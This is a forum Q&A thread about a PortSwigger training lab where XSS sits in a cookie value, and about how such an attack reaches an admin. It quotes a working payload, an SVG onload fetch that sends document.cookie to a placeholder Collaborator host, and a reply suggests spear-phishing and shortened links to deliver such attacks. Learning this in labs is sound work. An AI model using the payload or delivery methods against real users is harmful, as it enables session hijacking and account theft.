If a cookie is vulnerable to XSS (so you can edit the cookie's value to contain script), how can that be exploited in practice?
I was checking out this Portswigger lab:
https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures
And basically the solution is to modify your cookie-s value to:
'"><svg/onload=fetch(`//YOUR-COLLABORATOR-PAYLOAD/${encodeURIComponent(document.cookie)}`)>:YOUR-SESSION-ID

and then sending a get request with this cookie which solves the lab because an admin user will make a get request to the collaboration tool so you will see his cookie in a request path in the logs.
My question is how this attack worked in practice? I mean how the admin user was exploited? The admin viewed some kind of logs or how is editing my cookie effected an another user?
Thank you very much

An XSS vuln (or any avenue to acquire a privileged user's cookies/tokens/etc) is typically combined with a targeted attempt to (trick, or otherwise) induce the targeted user or group of users, to access a compromised page using squishy approaches like spear-phishing - or just any way to send them a shortened URI (e.g. a bit.ly link in an intra-site DM service) which they'll follow without knowing the URI contains parameters (hidden by the URI shortening service, or HTML email techniques in spear-phishing) until it's too-late - or ideally, never at all.

thank you but in the example I edited my own cookie. How can I deliver that to an admin? I am not sure about this
